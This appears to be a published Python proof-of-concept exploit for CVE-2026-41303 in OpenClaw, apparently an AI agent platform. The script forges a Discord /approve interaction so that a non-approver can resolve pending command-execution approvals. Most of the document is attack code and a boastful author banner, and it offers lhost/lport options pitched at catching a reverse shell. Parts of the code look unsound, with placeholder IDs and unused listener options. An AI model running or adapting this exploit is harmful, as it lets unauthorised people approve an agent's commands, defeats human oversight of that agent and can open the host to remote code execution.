OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass

#!/usr/bin/env python3 # Exploit Title: OpenClaw Discord Text Approval Authorization Bypass # CVE: CVE-2026-41303 # Date: 2026-04-21 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/openclaw/openclaw # Software Link: https://github.com/openclaw/openclaw # Affected: OpenClaw < 2026.3.28 # Tested on: OpenClaw 2026.3.24 # Category: Authorization Bypass # Platform: Linux / Discord # Exploit Type: Remote # CVSS: 8.8 # CWE : CWE-863 # Description: OpenClaw before 2026.3.28 contains an authorization bypass vulnerability in Discord text approval commands that allows non-approvers to resolve pending exec approvals. # Fixed in: 2026.3.28 # Usage: # python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py https://openclaw.example.com --lhost 192.168.1.100 --lport 4444 # # Options: # # Notes: # This is a simple PoC script that demonstrates the authorization bypass. # It requires a Discord user token with access to the channel where OpenClaw bot is present. # The script sends the /approve slash command to bypass the approvers list. # # How to Use # # Step 1: Obtain a pending approval ID from the OpenClaw Discord channel. # Step 2: Run the exploit with your Discord token, channel ID, approval ID, and decision. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-41303 • OpenClaw Discord Approval Bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import json import time def main(): parser = argparse.ArgumentParser(description="CVE-2026-41303 - OpenClaw Discord Approval Bypass PoC") parser.add_argument("target", help="OpenClaw instance URL or Discord guild/channel context") parser.add_argument("--token", required=True, help="Discord user or bot token") parser.add_argument("--channel-id", required=True, help="Discord channel ID where the bot listens") parser.add_argument("--approval-id", required=True, help="Pending approval ID to bypass") parser.add_argument("--decision", default="allow-once", choices=["allow-once", "allow-always"], help="Approval decision") parser.add_argument("--lhost", help="Your listener IP (for reverse shell if approval triggers RCE)") parser.add_argument("--lport", help="Your listener port") args = parser.parse_args() print("[+] Starting CVE-2026-41303 PoC by @banyamer_security") print(f"[+] Target : {args.target}") print(f"[+] Channel ID : {args.channel_id}") print(f"[+] Approval ID : {args.approval_id}") print(f"[+] Decision : {args.decision}") if args.lhost and args.lport: print(f"[+] Listener : {args.lhost}:{args.lport} (for post-approval payload)") # Build Discord interaction payload for /approve command payload = { "type": 2, # APPLICATION_COMMAND "application_id": "OPENCLAW_BOT_APP_ID", # Replace with actual OpenClaw bot application ID if known "guild_id": "YOUR_GUILD_ID", # Optional - fill if needed "channel_id": args.channel_id, "data": { "name": "approve", "options": [ {"name": "id", "value": args.approval_id}, {"name": "decision", "value": args.decision} ] } } headers = { "Authorization": f"{args.token}", "Content-Type": "application/json" } print("[+] Sending unauthorized /approve command via Discord API...") try: r = requests.post( "https://discord.com/api/v10/interactions", json=payload, headers=headers, timeout=10 ) print(f"[+] HTTP Status: {r.status_code}") if r.status_code in [200, 204]: print("[+] Success! The approval was processed without checking the approvers list.") print("[+] Non-approver successfully bypassed authorization (CVE-2026-41303).") if args.lhost and args.lport: print("[+] If the approved command spawns a shell, you should receive a connection shortly.") elif r.status_code == 401: print("[-] Invalid Discord token.") else: print(f"[-] Unexpected response: {r.text[:500]}") except Exception as e: print(f"[-] Error: {e}") print("\n[+] PoC completed. Patch to OpenClaw >= 2026.3.28 immediately.") print("[+] Credit: Mohammed Idrees Banyamer (@banyamer_security)") if __name__ == "__main__": main()